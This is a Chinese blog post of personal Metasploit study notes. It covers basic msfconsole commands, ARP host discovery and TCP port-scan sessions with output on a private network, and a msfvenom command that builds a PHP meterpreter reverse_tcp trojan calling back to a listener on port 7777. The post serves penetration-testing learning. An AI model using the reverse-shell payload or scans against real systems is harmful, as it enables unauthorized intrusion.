网络安全msf学习1

工具:netcat 

用途 :端口连接、数据提交

工具nmap 

用途:端口扫描、服务识别、操作系统指纹识别

工具 httprint

用途:通过远程http指纹判断http服务类型

工具: tamper ie

用途: http数据包修改、转发工具firefox插件

2.MSF命令

msfconsole 进入

0.help /?

1.search         help search  搜索

2.info  查看模块详细用法 

3.use  使用 

  show options查看参数

4.set x y 设置参数

  set  rhost  192.168.0.1

5.run /expoit

6.back 退回主界面

7.quit/exit 退出msf

2.信息收集

用来发现主机的

use auxiliary/scanner/discovery/arp_sweep

例子:

msf6 > use auxiliary/scanner/discovery/arp_sweep
msf6 auxiliary(scanner/discovery/arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
                                         metasploit.html
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    5                yes       The number of seconds to wait for new data

rhosts threads  timout是必填项

msf6 auxiliary(scanner/discovery/arp_sweep) > set rhost 192.168.50.1/24
rhost => 192.168.50.1/24
msf6 auxiliary(scanner/discovery/arp_sweep) > run

[+] 192.168.50.1 appears to be up (LANNER ELECTRONICS, INC.).
[+] 192.168.50.1 appears to be up (LANNER ELECTRONICS, INC.).
[+] 192.168.50.2 appears to be up (HUAWEI TECHNOLOGIES CO.,LTD).
[+] 192.168.50.3 appears to be up (Cisco Systems).
[+] 192.168.50.21 appears to be up (UNKNOWN).
[+] 192.168.50.23 appears to be up (UNKNOWN).
[+] 192.168.50.25 appears to be up (UNKNOWN).
[+] 192.168.50.26 appears to be up (UNKNOWN).
[+] 192.168.50.29 appears to be up (UNKNOWN).
[+] 192.168.50.30 appears to be up (UNKNOWN).
[+] 192.168.50.35 appears to be up (UNKNOWN).
[+] 192.168.50.37 appears to be up (UNKNOWN).
[+] 192.168.50.68 appears to be up (UNKNOWN).
[+] 192.168.50.53 appears to be up (VMware, Inc.).
[+] 192.168.50.74 appears to be up (UNKNOWN).
[+] 192.168.50.96 appears to be up (AIO LCD PC BU / TPV).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

msf6 > search portscan

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/portscan/ftpbounce                               normal  No     FTP Bounce Port Scanner
   1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner
   3  auxiliary/scanner/portscan/xmas                                    normal  No     TCP "XMas" Port Scanner
   4  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner
   5  auxiliary/scanner/portscan/tcp                                     normal  No     TCP Port Scanner
   6  auxiliary/scanner/portscan/syn                                     normal  No     TCP SYN Port Scanner
   7  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     Wordpress Pingback Locator


Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_access

msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usin
                                           g-metasploit.html
   THREADS      1                yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.50.96
rhosts => 192.168.50.96
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.50.96:        - 192.168.50.96:135 - TCP OPEN
[+] 192.168.50.96:        - 192.168.50.96:139 - TCP OPEN
[+] 192.168.50.96:        - 192.168.50.96:445 - TCP OPEN
[+] 192.168.50.96:        - 192.168.50.96:1027 - TCP OPEN
[+] 192.168.50.96:        - 192.168.50.96:5040 - TCP OPEN
[+] 192.168.50.96:        - 192.168.50.96:8900 - TCP OPEN
[*] 192.168.50.96:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

正向攻击   控制机直接控制靶机

反弹攻击  控制机打开端口  靶机运行木马 反向连接控制机

制作木马、获得反弹链接的shell

完整流程如下:

1.msfvenom  生成木马文件

2、msf监听指定端口

3、访问木马文件、获得meterpreter连接

不用启动msf交互终端msfconsole就可以制作木马

使用msfvenom

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.11 lport=7777 -o shell.php

启动lhost 和lport为 控制机地址和端口号。前提是控制机需要开启7777这个端口号的监听程序

  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MSF(Metasploit Framework)是一款强大的开源渗透测试工具,用于测试和评估计算机系统的安全性。学习MSF渗透工具有助于提高对网络安全的理解和技能。以下是一些学习MSF渗透工具的材料和方法: 1. 官方文档:Metasploit官方网站提供了完整的文档,包括用户指南、参考手册和教程。这些文档详细介绍了MSF的各个模块、命令、选项和使用方法。 2. 书籍:有一些书籍专门介绍了MSF的原理、用法和实例。例如《Metasploit: The Penetration Tester's Guide》,该书提供了深入的MSF知识,并帮助读者掌握渗透测试的技巧。 3. 在线教程:互联网上有许多免费的MSF教程和视频教程可供学习。通过这些教程,可以了解MSF的基本操作和常用技巧,并学习如何使用不同的模块和插件。 4. 实践演练:通过自己的实践和演练来学习MSF是非常重要的。可以使用虚拟机环境搭建实验环境,模拟真实的渗透测试场景,并运用MSF进行实际的渗透测试工作。 5. 社区和论坛:Metasploit拥有活跃的社区和论坛,可以与其他渗透测试者交流经验和学习心得。在这些社区中,可以获取到最新的MSF资讯、漏洞信息和实践技巧。 需要注意的是,渗透测试是一项敏感和专业的工作,必须遵守法律和道德准则。在学习和使用MSF工具时,务必要了解和遵守相关的法律法规,避免非法使用和侵犯他人的隐私和安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值